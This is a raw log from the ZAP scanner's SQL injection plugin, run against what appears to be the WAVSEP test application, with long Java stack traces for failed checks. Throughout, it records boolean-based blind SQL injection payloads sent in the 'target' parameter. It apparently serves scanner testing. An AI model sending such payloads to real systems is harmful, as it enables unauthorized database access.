[172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7024=1571] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7024=1571 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680601 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 9071=9071] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9071=9071 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680602 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6038=6038] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6038=6038 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680602 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7107=8076] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7107=8076 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680603 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7024=1571] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7024=1571 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680604 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5223=4580 AND ('TtiF'='TtiF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5223=4580 AND ('TtiF'='TtiF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680605 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3321=4735 AND ('aThC'='aThC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3321=4735 AND ('aThC'='aThC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680605 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5273=5273 AND ('qcpv'='qcpv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5273=5273 AND ('qcpv'='qcpv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680606 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5223=4580 AND ('TtiF'='TtiF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5223=4580 AND ('TtiF'='TtiF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680606 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7500=7500 AND ('ZeDo'='ZeDo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7500=7500 AND ('ZeDo'='ZeDo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680607 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 6414=9813 AND 'pfkd'='pfkd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6414=9813 AND 'pfkd'='pfkd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680609 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 8518=8518 AND 'TbHL'='TbHL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8518=8518 AND 'TbHL'='TbHL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680609 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3321=4735 AND ('aThC'='aThC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3321=4735 AND ('aThC'='aThC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680610 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 6414=9813 AND 'pfkd'='pfkd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6414=9813 AND 'pfkd'='pfkd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680610 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6523=6425 AND 'Jwmj'='Jwmj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6523=6425 AND 'Jwmj'='Jwmj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 